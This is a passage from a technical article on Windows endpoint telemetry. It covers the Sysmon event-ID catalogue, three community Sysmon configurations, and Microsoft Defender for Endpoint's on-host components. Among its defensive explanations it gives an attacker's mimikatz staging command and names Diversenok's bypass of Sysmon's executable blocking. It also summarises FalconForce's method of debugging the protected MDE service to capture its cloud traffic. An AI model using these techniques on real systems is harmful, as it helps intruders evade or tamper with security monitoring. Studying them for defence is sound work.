&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;RegistryEvent (Key/Value Rename)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CmRegisterCallbackEx&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceRegistryEvents&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;FileCreateStreamHash&lt;/td&gt;
&lt;td&gt;Filter Manager&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;ServiceConfigurationChange&lt;/td&gt;
&lt;td&gt;Sysmon-internal&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17&lt;/td&gt;
&lt;td&gt;PipeEvent (Pipe Created)&lt;/td&gt;
&lt;td&gt;Filter Manager minifilter on NPFS (&lt;code&gt;\Device\NamedPipe&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18&lt;/td&gt;
&lt;td&gt;PipeEvent (Pipe Connected)&lt;/td&gt;
&lt;td&gt;Filter Manager minifilter on NPFS (&lt;code&gt;\Device\NamedPipe&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;v6.0 (Feb 2017)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;19&lt;/td&gt;
&lt;td&gt;WmiEvent (filter)&lt;/td&gt;
&lt;td&gt;WMI ETW provider consumer&lt;/td&gt;
&lt;td&gt;v6.10 (mid-2017)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20&lt;/td&gt;
&lt;td&gt;WmiEvent (consumer)&lt;/td&gt;
&lt;td&gt;WMI ETW provider consumer&lt;/td&gt;
&lt;td&gt;v6.10 (mid-2017)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;21&lt;/td&gt;
&lt;td&gt;WmiEvent (consumer-to-filter binding)&lt;/td&gt;
&lt;td&gt;WMI ETW provider consumer&lt;/td&gt;
&lt;td&gt;v6.10 (mid-2017)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;DNSEvent (DNS query)&lt;/td&gt;
&lt;td&gt;ETW consumer of &lt;code&gt;Microsoft-Windows-DNS-Client&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;v10.0 (Jun 2019)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceNetworkEvents&lt;/code&gt; (&lt;code&gt;DnsQuery&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23&lt;/td&gt;
&lt;td&gt;FileDelete (archive)&lt;/td&gt;
&lt;td&gt;Filter Manager&lt;/td&gt;
&lt;td&gt;v11.10 (Jun 2020)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceFileEvents&lt;/code&gt; (partial)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;24&lt;/td&gt;
&lt;td&gt;ClipboardChange&lt;/td&gt;
&lt;td&gt;RDP and Win32 clipboard hooks&lt;/td&gt;
&lt;td&gt;v13.0 (2021; disputed)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;25&lt;/td&gt;
&lt;td&gt;ProcessTampering&lt;/td&gt;
&lt;td&gt;Image-load and &lt;code&gt;WriteProcessMemory&lt;/code&gt; heuristic&lt;/td&gt;
&lt;td&gt;v13.0 (2021; disputed)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;26&lt;/td&gt;
&lt;td&gt;FileDeleteDetected&lt;/td&gt;
&lt;td&gt;Filter Manager (non-archiving)&lt;/td&gt;
&lt;td&gt;v13.30 (2022)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceFileEvents&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;27&lt;/td&gt;
&lt;td&gt;FileBlockExecutable&lt;/td&gt;
&lt;td&gt;Filter Manager (blocking)&lt;/td&gt;
&lt;td&gt;v14.0 (Aug 2022)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;28&lt;/td&gt;
&lt;td&gt;FileBlockShredding&lt;/td&gt;
&lt;td&gt;Filter Manager (blocking)&lt;/td&gt;
&lt;td&gt;v14.10 (2022)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;29&lt;/td&gt;
&lt;td&gt;FileExecutableDetected&lt;/td&gt;
&lt;td&gt;Filter Manager&lt;/td&gt;
&lt;td&gt;v15.0 (Jun 2023)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DeviceFileEvents&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;255&lt;/td&gt;
&lt;td&gt;Error&lt;/td&gt;
&lt;td&gt;Sysmon-internal&lt;/td&gt;
&lt;td&gt;v1.0 (Aug 2014)&lt;/td&gt;
&lt;td&gt;(Sysmon-only)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Sysmon Version History repository&apos;s &quot;Outdated&quot; disclaimer (&quot;&lt;em&gt;I didn&apos;t find enough time to update this repo - sorry&lt;/em&gt;&quot;) means the v12 vs v13 boundary for ClipboardChange and ProcessTampering is community-disputed. The canonical Microsoft Learn page does not enumerate version-introduction metadata per event ID. The dates in the table for EIDs 24 and 25 are best-effort community attributions and should be treated as approximate until Microsoft publishes a per-EID version history [@sysmon-version-history][@sysmon-ms-learn].&lt;/p&gt;
&lt;h3&gt;The design intent, in one sentence&lt;/h3&gt;
&lt;p&gt;The catalogue exists because Sysmon&apos;s design choice -- the one Microsoft Learn still prints today -- explicitly refuses to do detection. The publisher emits structured events; the detection logic is somebody else&apos;s problem.&lt;/p&gt;

Sysmon does not provide analysis of the events it generates, nor does it attempt to hide itself from attackers.
&lt;p&gt;This is the sentence that explains the entire SwiftOnSecurity-NextronSystems-Hartong configuration lineage [@sysmon-ms-learn]. If Sysmon refuses to do detection, somebody has to write the rules. Three somebodies did, and they wrote three different sets, and the rest of §5 is about the trade-offs between them.&lt;/p&gt;
&lt;h3&gt;What EID 27 is, and what it is not&lt;/h3&gt;
&lt;p&gt;The 2022 introduction of &lt;em&gt;FileBlockExecutable&lt;/em&gt; (EID 27) was the first preventive event in Sysmon&apos;s history. Olaf Hartong&apos;s contemporaneous writeup and Diversenok&apos;s independent reproduction both describe what the event does, and the mechanism is more subtle than &quot;the I/O is denied.&quot; The Sysmon minifilter intercepts the file-handle &lt;em&gt;close&lt;/em&gt; operation. If the rule matches and the file content carries an MZ/PE header, Sysmon logs EID 27 and marks the file for deletion via &lt;code&gt;FILE_DISPOSITION_INFORMATION&lt;/code&gt; [@diversenok-2022][@hartong-sysmon14-medium]. The attacker&apos;s &lt;code&gt;cmd /c copy mimikatz.exe C:\Users\Public\&lt;/code&gt; produces no command-line error. The copy appears to succeed. The file is then deleted at handle-close time. Hartong&apos;s writeup captures the user-visible effect verbatim: &quot;*While there is no error on the command line, the file is not written to disk*&quot; [@hartong-sysmon14-medium]. Diversenok&apos;s reverse-engineering reads: &quot;*Sysmon monitors and deletes files on closing instead of writing*&quot; [@diversenok-2022]. The closing-time semantics is the structural reason Diversenok&apos;s &lt;code&gt;Bypass #1&lt;/code&gt; (split create-close from open-write-close) works at all; the bypass is incoherent under an &lt;code&gt;Access Denied&lt;/code&gt;-at-create model and obvious under the close-time-delete model.&lt;/p&gt;
&lt;p&gt;This is a confined preventive surface, and it should not be confused with the much larger Defender exploit-protection blocking surface. &lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;Defender exploit protection mitigations&lt;/a&gt; include arbitrary-code-guard, control-flow-guard enforcement, and ASR rules -- they sit inside the Defender Antivirus and MDE stacks. EID 27&apos;s blocking is one Sysmon minifilter making a file-create decision; it is not a general-purpose application-allow-list, and it is not a substitute for &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;Windows Defender Application Control&lt;/a&gt;. Hartong&apos;s writeup is explicit about the scope -- &quot;&lt;em&gt;the FileBlockExecutable event&lt;/em&gt;&quot; -- as is Diversenok&apos;s: the introduction reads &quot;&lt;em&gt;the update introduced the first preventive measure -- the FileBlockExecutable event (ID 27)&lt;/em&gt;&quot; [@diversenok-2022].&lt;/p&gt;
&lt;p&gt;Twenty-nine events, four hardening releases, one schema. The catalogue is only useful if you configure Sysmon to emit subsets of it, and configuration is where the field&apos;s three lineages diverged.&lt;/p&gt;
&lt;h2&gt;5. Three Canonical Sysmon Configurations&lt;/h2&gt;
&lt;p&gt;Every production Sysmon deployment in the field is forked from one of three repositories. The lineage matters, and one of the things this article fixes is a common attribution error -- &quot;Florian Roth wrote the canonical Sysmon config&quot; is in widespread circulation, but the canonical &lt;em&gt;root&lt;/em&gt; is SwiftOnSecurity&apos;s repository, and Roth&apos;s repo is a 2018 fork of it.&lt;/p&gt;

The open-source generic-signature-format authored by Florian Roth and his collaborators at Nextron Systems; the SIEM-and-EDR field&apos;s vendor-neutral detection-rule lingua franca. The `SigmaHQ/sigma` repository ships over 3,000 detection rules covering the Windows kernel-callback surface (heavily Sysmon-aware), Linux audit, macOS unified log, AWS CloudTrail, Microsoft 365, and other event sources. Sigma rules are written once and compiled by community converters into the per-tool query languages (KQL for Defender XDR / Sentinel, SPL for Splunk, EQL for Elastic) [@github-sigma].
&lt;h3&gt;SwiftOnSecurity/sysmon-config (February 2017)&lt;/h3&gt;
&lt;p&gt;The historical root. The pseudonymous account &lt;em&gt;SwiftOnSecurity&lt;/em&gt; published the first widely-cited Sysmon configuration template on &lt;strong&gt;February 1, 2017&lt;/strong&gt; per the GitHub REST API [@github-swiftonsecurity-meta]. The README&apos;s design intent is the single sentence still printed at the top of the repo: &quot;&lt;em&gt;This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing&lt;/em&gt;&quot; [@github-swiftonsecurity]. The template emphasises clarity over coverage; the XML is heavily commented, and the rule structure follows a deliberately conservative pattern of &lt;code&gt;&amp;lt;Include&amp;gt;&lt;/code&gt; blocks per technique.&lt;/p&gt;
&lt;p&gt;SwiftOnSecurity&apos;s config is the most-cited starting point for Sysmon deployments worldwide and the one that detection-engineering tutorials default to. It is also the &lt;em&gt;parent&lt;/em&gt; of every other Sysmon-config repository on GitHub, in the literal GitHub-fork sense -- the GitHub REST API for both NextronSystems/sysmon-config and (via the historical fork-graph) other community configs returns &lt;code&gt;SwiftOnSecurity/sysmon-config&lt;/code&gt; as the parent [@github-nextronsystems-meta].&lt;/p&gt;
&lt;h3&gt;Neo23x0/sysmon-config, now NextronSystems/sysmon-config (January 2018, renamed 2021)&lt;/h3&gt;
&lt;p&gt;Florian Roth, working under his GitHub handle &lt;code&gt;@Neo23x0&lt;/code&gt;, forked SwiftOnSecurity&apos;s config in January 2018 and added blocking-rule support for Sysmon v14 plus the merged community pull-request set. The README&apos;s design intent reads: &quot;&lt;em&gt;This is a forked and modified version of @SwiftOnSecurity&apos;s sysmon config. ... We merged most of the 30+ open pull requests&lt;/em&gt;&quot; [@github-neo23x0]. The maintainer roster as of the present writing is Florian Roth (&lt;code&gt;@Neo23x0&lt;/code&gt;), Tobias Michalski (&lt;code&gt;@humpalum&lt;/code&gt;), Christian Burkard (&lt;code&gt;@phantinuss&lt;/code&gt;), and Nasreddine Bencherchali (&lt;code&gt;@nas_bench&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;The repository ships a &lt;em&gt;blocking&lt;/em&gt; variant, &lt;code&gt;sysmonconfig-export-block.xml&lt;/code&gt;, that adds &lt;code&gt;&amp;lt;RuleGroup&amp;gt;&lt;/code&gt; blocks targeting EID 27 (FileBlockExecutable) and EID 28 (FileBlockShredding) for the most common malware-staging file paths. This is the variant SOC teams deploy when they want Sysmon&apos;s preventive surface to participate in the response pipeline as a hard block rather than as a detection-only artifact.&lt;/p&gt;

The legacy URL `https://github.com/Neo23x0/sysmon-config` now HTTP-301 redirects to `https://github.com/NextronSystems/sysmon-config`. The GitHub REST API for the current repository returns `created_at: 2021-07-24T06:19:41Z` with `parent: SwiftOnSecurity/sysmon-config`, which means the repository as it now exists was created in mid-2021 when Florian Roth moved it from his personal handle to his employer&apos;s organization namespace [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; the move is an organizational one. The exact pre-rename creation date of the original `Neo23x0/sysmon-config` repository is not reliably retrievable from the current API and is best dated as January 2018 based on the README and the fork-history.
&lt;h3&gt;olafhartong/sysmon-modular (January 13, 2018)&lt;/h3&gt;
&lt;p&gt;Olaf Hartong&apos;s &lt;code&gt;sysmon-modular&lt;/code&gt; was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository&apos;s design takes a different shape from the monolithic SwiftOnSecurity and NextronSystems configs: instead of one carefully-tuned XML, Hartong publishes a per-EID-per-technique module library that compiles into one of five pre-generated artifacts plus an arbitrary number of custom builds [@github-hartong-modular]. The pre-generated variants are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;sysmonconfig.xml&lt;/code&gt; -- the default deployment baseline.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sysmonconfig-with-filedelete.xml&lt;/code&gt; -- default plus the EID 23 archive variant of file delete, which preserves the deleted file in &lt;code&gt;C:\Sysmon\&lt;/code&gt; (volume-cost trade-off; recommend dedicated drive).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sysmonconfig-excludes-only.xml&lt;/code&gt; -- the verbose variant, which captures everything except a small set of well-known exclusions; useful for detection-engineering R&amp;amp;D on a single host.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sysmonconfig-research.xml&lt;/code&gt; -- the super-verbose variant, with the README&apos;s standing warning: &quot;&lt;em&gt;really DO NOT USE IN PRODUCTION!&lt;/em&gt;&quot; -- this is for live-malware-sample analysis in a sandbox, not for fleet rollout.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt; -- the variant whose entire design intent is to augment Microsoft Defender for Endpoint&apos;s collection surface &quot;&lt;em&gt;to have as little overlap as possible&lt;/em&gt;&quot; with what MDE already captures [@github-hartong-modular].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The MDE-augment config is the artifact this article keeps returning to. It is the operational answer -- maintained by a person, not by Microsoft -- to the question of which Sysmon events are worth collecting on a host that already has MDE installed. We will return to its specific contents in §10. For now, the key observation is that this config exists because of a documented absence: Microsoft has not published a per-&lt;code&gt;ActionType&lt;/code&gt; cross-walk between MDE&apos;s &lt;code&gt;Device*&lt;/code&gt; schema and Sysmon&apos;s manifest, so Hartong reverse-engineered one.&lt;/p&gt;
&lt;h3&gt;Side-by-side comparison&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;SwiftOnSecurity/sysmon-config&lt;/th&gt;
&lt;th&gt;NextronSystems/sysmon-config (formerly Neo23x0)&lt;/th&gt;
&lt;th&gt;olafhartong/sysmon-modular&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Author / org&lt;/td&gt;
&lt;td&gt;SwiftOnSecurity (pseudonymous)&lt;/td&gt;
&lt;td&gt;Florian Roth + Nextron Systems team&lt;/td&gt;
&lt;td&gt;Olaf Hartong (and FalconForce collaborators)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Created&lt;/td&gt;
&lt;td&gt;Feb 1, 2017&lt;/td&gt;
&lt;td&gt;Forked Jan 2018; renamed Jul 24, 2021&lt;/td&gt;
&lt;td&gt;Jan 13, 2018&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Distribution&lt;/td&gt;
&lt;td&gt;One monolithic XML&lt;/td&gt;
&lt;td&gt;Two XMLs (audit + blocking)&lt;/td&gt;
&lt;td&gt;Modular per-technique + five pre-generated builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Design philosophy&lt;/td&gt;
&lt;td&gt;Quality starting point, conservative&lt;/td&gt;
&lt;td&gt;Community-maintained, blocking-aware&lt;/td&gt;
&lt;td&gt;Tunable modular, MITRE ATT&amp;amp;CK-mapped&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best used for&lt;/td&gt;
&lt;td&gt;First-time Sysmon deployment&lt;/td&gt;
&lt;td&gt;Standalone Sysmon at scale&lt;/td&gt;
&lt;td&gt;Sysmon alongside MDE, or per-team customization&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pre-generated v14+ blocking&lt;/td&gt;
&lt;td&gt;No (audit only)&lt;/td&gt;
&lt;td&gt;Yes (&lt;code&gt;sysmonconfig-export-block.xml&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Yes (built from blocking modules)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MDE coexistence variant&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (&lt;code&gt;sysmonconfig-mde-augment.xml&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Choosing among the three&lt;/h3&gt;
&lt;p&gt;The detection-engineering trade-off framing is short. Pick SwiftOnSecurity when you want a clean, well-commented starting point and you are not yet sure which events you actually need. Pick NextronSystems when you want a community-maintained baseline that already has the blocking rules for Sysmon v14+. Pick Hartong when you want fine-grained per-technique tunability or, more commonly, when you are running MDE and need Sysmon to augment rather than duplicate it.&lt;/p&gt;
&lt;p&gt;Tactical caution worth one inline note: Sysmon supports &lt;strong&gt;one active configuration at a time&lt;/strong&gt;. There is no aggregate-multiple-XMLs feature at the driver layer. Hartong&apos;s modular approach generates a single merged XML at build time; the production fleet receives that single XML and the driver enforces it. If you are trying to run two configurations side by side -- one for the SOC&apos;s hunting, one for the platform team&apos;s audit -- pick one, merge the rules, and ship the combined product. The deployment tooling in &lt;code&gt;sysmon-modular&lt;/code&gt; is built around exactly this constraint.&lt;/p&gt;
&lt;p&gt;All three configurations assume the same thing: either Sysmon is the only EDR on the host (a deployment posture that exists in air-gapped, regulatory-no-cloud, or unlicensed environments) or it is augmenting an EDR whose collection surface is known. The augment case is the one where the field has converged on Hartong. To understand why, we have to look at what the &lt;em&gt;other&lt;/em&gt; EDR -- Microsoft&apos;s own -- actually collects on the host.&lt;/p&gt;
&lt;h2&gt;6. Microsoft Defender for Endpoint: The Documented On-Host Surface&lt;/h2&gt;
&lt;p&gt;Two questions about MDE have very different answers. &lt;em&gt;What does Microsoft Defender for Endpoint run on this host?&lt;/em&gt; has a primary-source-quality answer from Microsoft Learn. &lt;em&gt;What does it actually do?&lt;/em&gt; has only a community-observed answer. The documented surface is the user-mode component inventory plus registry hives and event sources. The community-observed surface includes the kernel-callback inventory, the cloud TLS-pinning details, and the inter-process communication paths -- none of which Microsoft has published. Naming both halves with the right citations on each side is one of the few things this article does that other writeups skip.&lt;/p&gt;
&lt;h3&gt;The documented surface (Microsoft Learn, primary)&lt;/h3&gt;
&lt;p&gt;On every onboarded Windows endpoint, Microsoft Defender for Endpoint installs and runs a Windows service named &lt;strong&gt;&lt;code&gt;Sense&lt;/code&gt;&lt;/strong&gt;, whose display name is &quot;Microsoft Defender for Endpoint Service&quot; and whose backing executable is &lt;code&gt;MsSense.exe&lt;/code&gt;. The on-host troubleshooting page documents the canonical health-check command: &lt;code&gt;sc query sense&lt;/code&gt; [@sense-troubleshoot]. On Windows Server 2019, Server 2022, Server 2025, and Azure Stack HCI 23H2 or later, MDE is delivered as a &lt;em&gt;Feature on Demand&lt;/em&gt; with the capability name &lt;code&gt;Microsoft.Windows.Sense.Client~~~~&lt;/code&gt;. Microsoft documents the verification command verbatim: &quot;&lt;em&gt;DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~&lt;/em&gt;&quot; [@sense-troubleshoot][@ms-server-endpoints-learn].&lt;/p&gt;
&lt;p&gt;Onboarding state is recorded under two registry hives that Microsoft Learn names explicitly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection&lt;/code&gt; -- the policy-driven configuration surface.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status&lt;/code&gt; -- the run-time onboarding state.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Onboarding diagnostics land in the &lt;strong&gt;&lt;code&gt;WDATPOnboarding&lt;/code&gt;&lt;/strong&gt; event source under the Application event log, with documented event IDs 5, 10, 15, 30, 35, 40, 65, and 70, each of which corresponds to a specific failure mode with a specific resolution procedure [@sense-troubleshoot]. The product installs to &lt;code&gt;C:\Program Files\Windows Defender Advanced Threat Protection\&lt;/code&gt; (the legacy path is preserved even after the September 2020 rebrand).&lt;/p&gt;
&lt;p&gt;The documented surface stops here. Microsoft Learn names &lt;code&gt;MsSense.exe&lt;/code&gt;, the &lt;code&gt;Sense&lt;/code&gt; service, the registry hives, the event source, the Feature on Demand, and the four operating systems. Microsoft Learn does &lt;em&gt;not&lt;/em&gt; publish a kernel-callback inventory for the MDE EDR sensor.&lt;/p&gt;
&lt;h3&gt;The community-observed surface&lt;/h3&gt;
&lt;p&gt;Past the documented boundary, what is in field-published primary sources is the user-mode binary inventory and the cloud-side TLS path. Three companion binaries sit alongside &lt;code&gt;MsSense.exe&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;SenseCncProxy.exe&lt;/code&gt;&lt;/strong&gt; is the cloud-command-and-control proxy. This is the binary that holds the TLS connection out to Defender XDR ingest, applies the certificate-pinning policy, and shuttles agent-bound commands (live-response actions, custom-detection-rule pushes, sensor-configuration updates) back down to &lt;code&gt;MsSense.exe&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;SenseIR.exe&lt;/code&gt;&lt;/strong&gt; is the live-response and investigation actions binary. When a SOC analyst clicks &lt;strong&gt;Run script&lt;/strong&gt; or &lt;strong&gt;Collect investigation package&lt;/strong&gt; in the Defender XDR portal, &lt;code&gt;SenseIR.exe&lt;/code&gt; is the process that fulfils the request on the endpoint side.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;SenseNdr.exe&lt;/code&gt;&lt;/strong&gt; is the network detection and response component, responsible for endpoint-side enrichment of network observations used in the &lt;code&gt;DeviceNetworkEvents&lt;/code&gt; table.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These binaries are not enumerated on Microsoft Learn in the same way the &lt;code&gt;Sense&lt;/code&gt; service itself is. They are documented in MDE incident-response runbooks, in third-party reverse-engineering posts, and in the file-system signature data on any onboarded endpoint. The article treats their existence as community-observed. &lt;code&gt;SenseIR.exe&lt;/code&gt; is corroborated by InfoGuard 2025&apos;s reverse-engineering of MDE&apos;s live-response cloud path [@infoguard-2025]; &lt;code&gt;SenseNdr.exe&lt;/code&gt; in particular lacks an explicit community primary writeup as of 2026 -- its role here is inferred from its on-disk binary metadata and the file-system signature data on onboarded endpoints.&lt;/p&gt;
&lt;p&gt;The kernel-side surface MDE shares with Defender Antivirus &lt;em&gt;is&lt;/em&gt; documented in the Defender Antivirus product line [@ms-defender-av-arch]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WdBoot.sys&lt;/code&gt;&lt;/strong&gt; is the &lt;strong&gt;Early-Launch Antimalware (ELAM)&lt;/strong&gt; driver. It is the first non-Windows driver to load at boot and gates which non-ELAM drivers are allowed to load after it. It is signed with the &lt;strong&gt;Antimalware Extended Key Usage&lt;/strong&gt;, &lt;code&gt;1.3.6.1.4.1.311.61.4.1&lt;/code&gt; [@ms-learn-elam-sample].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WdFilter.sys&lt;/code&gt;&lt;/strong&gt; is the Defender Antivirus file-system minifilter. It sits alongside &lt;code&gt;SysmonDrv.sys&lt;/code&gt; at a different Filter Manager altitude.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;WdNisDrv.sys&lt;/code&gt;&lt;/strong&gt; is the Network Inspection System driver, which provides the host-firewall-augmenting NIS layer.&lt;/li&gt;
&lt;/ul&gt;

A Windows process-protection level, introduced in Vista (as Protected Process, for DRM) and extended in Windows 8.1 (for antimalware), that prevents user-mode debugger attach, code injection, and `OpenProcess` for write from any caller that does not itself run at an equal or higher PPL signer level. Antimalware-PPL (`PROTECTED_ANTIMALWARE_LIGHT`) is the level reserved for security products signed with the Antimalware EKU; `MsSense.exe` and Sysmon v15+ both run at this level.

The Windows boot-order privilege that lets a driver signed with the Antimalware EKU `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample] load before any non-ELAM driver and classify subsequent boot-start drivers as `Good`, `Bad`, or `Unknown` so the kernel can decide which to load. The ELAM driver *itself* is measured (along with the bootloader, kernel, and other early-boot artefacts) into TPM PCRs by Windows&apos;s *Measured Boot*, which is a separate boot-integrity feature; ELAM&apos;s job is to classify, not to measure. Defender Antivirus&apos;s `WdBoot.sys` is the canonical ELAM driver. Sysmon&apos;s `SysmonDrv.sys` is *not* ELAM-signed; this is the pre-driver-load horizon discussed in §12.

The Authenticode Extended Key Usage `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample], issued by Microsoft to security vendors after a code-signing and behavioral review. The EKU gates two distinct things: ELAM signing eligibility (so the driver loads first) and Antimalware-PPL eligibility for the user-mode service (so the service is harder to tamper with). MDE&apos;s `MsSense.exe`, Defender Antivirus&apos;s `MsMpEng.exe`, and Sysmon v15+ all carry this signature path.
&lt;h3&gt;Antimalware-PPL on MsSense.exe&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;MsSense.exe&lt;/code&gt; service runs as &lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Antimalware-PPL&lt;/a&gt;&lt;/strong&gt; -- &lt;code&gt;PROTECTED_ANTIMALWARE_LIGHT&lt;/code&gt; in the kernel data structure. The protection level prevents an attacker with SYSTEM privileges from attaching a user-mode debugger, suspending the service, or injecting code into its address space using ordinary Windows debugging or code-injection APIs. This is the same protection level Sysmon v15+ runs at, and it is the same level Defender Antivirus&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; has run at since Windows 8.1. The structural defense closes user-mode tampering as a class. The residual attack surface is kernel-mode primitives -- which is what FalconForce had to use in 2022 to debug MDE [@falconforce-2022].&lt;/p&gt;
&lt;h3&gt;The dispositive reverse-engineering primary: FalconForce 2022&lt;/h3&gt;
&lt;p&gt;Olaf Hartong and Henri Hambartsumyan, working at FalconForce, published the most-cited reverse-engineering writeup of MDE&apos;s on-host architecture in 2022. The post&apos;s TL;DR captures both the debug-bypass technique and the cloud vulnerability that resulted from applying it:&lt;/p&gt;

You can debug MDE running on an endpoint by running `dbgsrv.exe` and raising its PPL protection to WinTcb. This can be used to snoop on data being transmitted by MDE to the cloud. We identified a vulnerability related to missing authorization checks of data sent from the MDE endpoint to the M365 cloud, allowing anyone to send spoofed data to any M365 tenant.
&lt;p&gt;The technique is precise [@falconforce-2022]. FalconForce raised the PPL signer level of Windows&apos;s PE debug server (&lt;code&gt;dbgsrv.exe&lt;/code&gt;) to &lt;code&gt;WinTcb&lt;/code&gt; -- a signer level &lt;em&gt;higher&lt;/em&gt; than Antimalware-PPL -- and used the elevated debug server to attach to &lt;code&gt;MsSense.exe&lt;/code&gt;. From inside that debug session they instrumented &lt;code&gt;SspiCli!EncryptMessage&lt;/code&gt;, the SSPI function MDE&apos;s cloud transport uses to wrap each outbound message before TLS encryption, and captured the plaintext payloads. The plaintext capture surfaced &lt;strong&gt;CVE-2022-23278&lt;/strong&gt;: a missing-authorization vulnerability in which the M365 cloud trusted whatever device-identifying claims the endpoint asserted, with no cross-check that the asserting endpoint owned the device identity it claimed [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. Microsoft patched the vulnerability on March 8, 2022, with a public acknowledgement to FalconForce: 